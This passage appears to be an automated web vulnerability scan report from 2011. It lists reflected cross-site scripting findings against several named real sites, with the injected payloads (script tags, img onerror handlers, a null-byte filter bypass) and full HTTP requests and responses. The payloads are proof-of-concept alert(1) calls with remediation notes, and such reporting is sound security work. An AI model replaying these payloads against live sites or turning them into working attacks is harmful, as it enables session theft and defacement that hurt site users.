Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e81ae"%3balert(1)//c6ff7eee9a1 was submitted in the mpck parameter. This input was echoed as e81ae";alert(1)//c6ff7eee9a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254960678256\">" ); var rvr_id=254960678256; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254960678256&imp_rvr_id=254960678256e81ae";alert(1)//c6ff7eee9a1"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bee9"%3balert(1)//4c140ba25e9 was submitted in the mpvc parameter. This input was echoed as 1bee9";alert(1)//4c140ba25e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254960678256\">" ); var rvr_id=254960678256; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... vertising.com%2Fclick%2Fsite%3D0000805760%2Fmnum%3D0001017409%2Fcstr%3D14709292%3D_4e4459f6%2C8352185012%2C805760%5E1017409%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D14709292%2Foptn%3D64%3Ftrg%3D1bee9";alert(1)//4c140ba25e9"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANOgYEy-_0Bo-HCZRD1jHzH2WUROAAAAAItwCABkAAAAZAAAAAIAAACdaggAh7wAAAEAAABVU0QAVVNE ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c589f'><script>alert(1)</script>a7f2b3d0ba2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/getCommentCounts.phpc589f'><script>alert(1)</script>a7f2b3d0ba2?src=wp-2&acct=212708dd21f0d86d12b845179edd5ef0&ids=&guids=&links=&titles=&authors=×= HTTP/1.1 Host: intensedebate.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.whatgives.com/donationapp/?ref=pplabs
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Aug 2011 14:09:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.phpc589f'><script>alert(1)</script>a7f2b3d0ba2?src=wp-2&acct=212708dd21f0d86d12b845179edd5ef0&ids=&guids=&links=&titles=&authors=×='> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 34ef6'><script>alert(1)</script>afd580c60d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/wordpressTemplateLinkWrapper2.php34ef6'><script>alert(1)</script>afd580c60d5?acct=212708dd21f0d86d12b845179edd5ef0 HTTP/1.1 Host: intensedebate.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.whatgives.com/donationapp/?ref=pplabs
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Aug 2011 14:09:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php34ef6'><script>alert(1)</script>afd580c60d5?acct=212708dd21f0d86d12b845179edd5ef0'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e4460'><script>alert(1)</script>e7e12777844 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /remoteVisit.phpe4460'><script>alert(1)</script>e7e12777844?acct=212708dd21f0d86d12b845179edd5ef0&time=1313158224112 HTTP/1.1 Host: intensedebate.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.whatgives.com/donationapp/?ref=pplabs
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Aug 2011 14:10:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.phpe4460'><script>alert(1)</script>e7e12777844?acct=212708dd21f0d86d12b845179edd5ef0&time=1313158224112'> ...[SNIP]...
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 419d1'%3balert(1)//c9a64775f57 was submitted in the q parameter. This input was echoed as 419d1';alert(1)//c9a64775f57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rightnow/index.php?tpl=ask&q=xss419d1'%3balert(1)//c9a64775f57 HTTP/1.1 Host: interface.q-go.net Proxy-Connection: keep-alive Referer: http://www.rightnow.com/company-contact.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 18:16:23 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 3769 Connection: close Content-Type: text/html; charset=iso-8859-15
The value of the cD request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 835e9%3balert(1)//28fba634b62 was submitted in the cD parameter. This input was echoed as 835e9;alert(1)//28fba634b62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY&cD=835e9%3balert(1)//28fba634b62&rF=False&iType=1&domainname=0 HTTP/1.1 Host: ips-invite.iperceptions.com Proxy-Connection: keep-alive Referer: http://go.magento.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Srv-By: IPS-INVITE01 P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA" Date: Fri, 12 Aug 2011 13:44:36 GMT Content-Length: 3026
var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=S ...[SNIP]... getLinkerUrl(url, false); } catch(e){ } return url; }var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && GetC('IPE_S_103836') == null && tCv != null) {CCook(sC,sC,835e9;alert(1)//28fba634b62); Ld();} DCook(tC);function CCook(n,v,d){var exp= ''; var dm = document.domain;if (d) {var dt= new Date();dt.setTime(dt.getTime()+(d*24*60*60*1000));exp='; expires='+dt.toGMTString();}document.cookie= ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddae3'%3beb11d4767f0 was submitted in the loc parameter. This input was echoed as ddae3';eb11d4767f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=ddae3'%3beb11d4767f0&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1 Host: ips-invite.iperceptions.com Proxy-Connection: keep-alive Referer: http://go.magento.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Srv-By: IPS-INVITE03 P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA" Date: Fri, 12 Aug 2011 13:42:37 GMT Content-Length: 3000
var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'ddae3';eb11d4767f0'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=ddae3%27%3beb11d4767f0&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'; rn='103836';var s ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0024e08'-alert(1)-'3fafaf9c842 was submitted in the loc parameter. This input was echoed as 24e08'-alert(1)-'3fafaf9c842 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY%0024e08'-alert(1)-'3fafaf9c842&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1 Host: ips-invite.iperceptions.com Proxy-Connection: keep-alive Referer: http://go.magento.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Srv-By: IPS-INVITE03 P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA" Date: Fri, 12 Aug 2011 13:44:23 GMT Content-Length: 3034
var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.24e08'-alert(1)-'3fafaf9c842'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY%0024e08%27-alert(1)-%273fafaf9c842&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'; ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ed672<script>alert(1)</script>e8459f403c7 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=K05540ed672<script>alert(1)</script>e8459f403c7 HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload ca568<a>8469a0c1935 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 21:50:16 GMT Server: Apache/2.2 Content-Length: 630 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 31 Aug 2011 21:50:16 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=97043431&IREFER_HOST=google.com&ADREQ&beacon=1ca568<a>8469a0c1935&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1568846901935' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw3.cnet.com::1399384 ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6ef3'%3balert(1)//ea97ed25b95 was submitted in the PAGESTATE parameter. This input was echoed as d6ef3';alert(1)//ea97ed25b95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 21:49:55 GMT Server: Apache/2.2 Content-Length: 233 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 31 Aug 2011 21:49:55 GMT
/* MAC ad */<!-- no beacon mappings defined -->;window.CBSI_PAGESTATE='d6ef3';alert(1)//ea97ed25b95';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw6.cnet.com::3033344912 2011.08.31.21.49.55 *//* MAC T 0.0.0.0 */
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload f685b<a>c254e1d7c3b was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 31 Aug 2011 21:49:56 GMT Server: Apache/2.2 Content-Length: 674 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 31 Aug 2011 21:49:56 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11f685b<a>c254e1d7c3b&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesO ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9959d<img%20src%3da%20onerror%3dalert(1)>686a587fb64 was submitted in the REST URL parameter 1. This input was echoed as 9959d<img src=a onerror=alert(1)>686a587fb64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /serve.php9959d<img%20src%3da%20onerror%3dalert(1)>686a587fb64?lid=583648&dn=toyhookupinc.com HTTP/1.1 Host: ndparking.com Proxy-Connection: keep-alive Referer: http://www.toyhookupinc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload bc5bd<img%20src%3da%20onerror%3dalert(1)>1d43d8ca98c was submitted in the dn parameter. This input was echoed as bc5bd<img src=a onerror=alert(1)>1d43d8ca98c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /serve.php?lid=583648&dn=toyhookupinc.combc5bd<img%20src%3da%20onerror%3dalert(1)>1d43d8ca98c HTTP/1.1 Host: ndparking.com Proxy-Connection: keep-alive Referer: http://www.toyhookupinc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.276. http://ndparking.com/serve.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ndparking.com
Path:
/serve.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ab66<img%20src%3da%20onerror%3dalert(1)>fba4a16700b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4ab66<img src=a onerror=alert(1)>fba4a16700b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /serve.php?lid=583648&dn=toyhookupinc/4ab66<img%20src%3da%20onerror%3dalert(1)>fba4a16700b.com HTTP/1.1 Host: ndparking.com Proxy-Connection: keep-alive Referer: http://www.toyhookupinc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the targetRow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc89f"><script>alert(1)</script>2cb911969fb was submitted in the targetRow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the the_field request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93bc"><script>alert(1)</script>15144e7e833 was submitted in the the_field parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the position request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51d9"%3balert(1)//fc057915e27 was submitted in the position parameter. This input was echoed as b51d9";alert(1)//fc057915e27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d395'-alert(1)-'02d5b309f8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit3d395'-alert(1)-'02d5b309f8a/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836? HTTP/1.1 Host: origin.collective-media.net Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 31 Aug 2011 17:54:39 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:39 GMT Content-Length: 480
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc36e'-alert(1)-'bd390394690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit/homepagecc36e'-alert(1)-'bd390394690;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836? HTTP/1.1 Host: origin.collective-media.net Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 31 Aug 2011 17:54:40 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:40 GMT Content-Length: 480
1.282. http://origin.collective-media.net/adj/ns.informit/homepage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://origin.collective-media.net
Path:
/adj/ns.informit/homepage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7178'-alert(1)-'eed06b52a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836?&d7178'-alert(1)-'eed06b52a24=1 HTTP/1.1 Host: origin.collective-media.net Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 31 Aug 2011 17:54:38 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:38 GMT Content-Length: 483
The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd6b'-alert(1)-'bf426a113ed was submitted in the ppos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836?edd6b'-alert(1)-'bf426a113ed HTTP/1.1 Host: origin.collective-media.net Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 31 Aug 2011 17:54:37 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:37 GMT Content-Length: 480
